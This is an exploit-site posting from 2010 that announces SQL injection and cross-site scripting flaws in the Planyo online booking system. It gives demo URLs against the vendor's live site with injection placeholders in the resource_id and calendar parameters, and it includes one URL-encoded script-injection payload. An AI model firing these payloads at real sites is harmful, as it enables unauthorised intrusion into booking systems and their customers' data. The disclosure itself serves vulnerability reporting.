Booking System for Planyo Multiple VUlnerabilty
Posted on 11 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Booking System for Planyo Multiple VUlnerabilty</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=============================================== Booking System for Planyo Multiple VUlnerabilty =============================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ################################### 1 0 I'm SONiC member from Inj3ct0r Team 1 1 ################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Webapp : Booking System for Planyo Vendor : http://www.planyo.com/ Description : Planyo is a commission-free flexible online reservation system for any kind of resources such as hotels, holiday apartments, yacht rentals, driving schools, tennis courts, doctor appointments, events etc. Planyo is available in 7 languages and helps you manage your clients' bookings by handling all email communication with the clients, allowing various booking confirmation mechanisms, handling payments (also online credit card payments), printing invoices etc. ############################################################################################################### Exploit: SQli is possible in about-calendar.php,about-resource.php Demo url : http://www.planyo.com/about-resource.php?resource_id=[Sqli] http://www.planyo.com/about-calendar.php?calendar=[Sqli] Xss Vuln Attack pattern : %27%22--%3E%3Cscript%3Ealert%280x000872%29%3C/script%3E Demo url : http://www.planyo.com/about-calendar.php?calendar=[Xss] http://www.planyo.com/about-resource.php?resource_id=[xss] ############################################################################################################### # ..::[ SONiC ]::.. aka the_M4LW4R3 # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
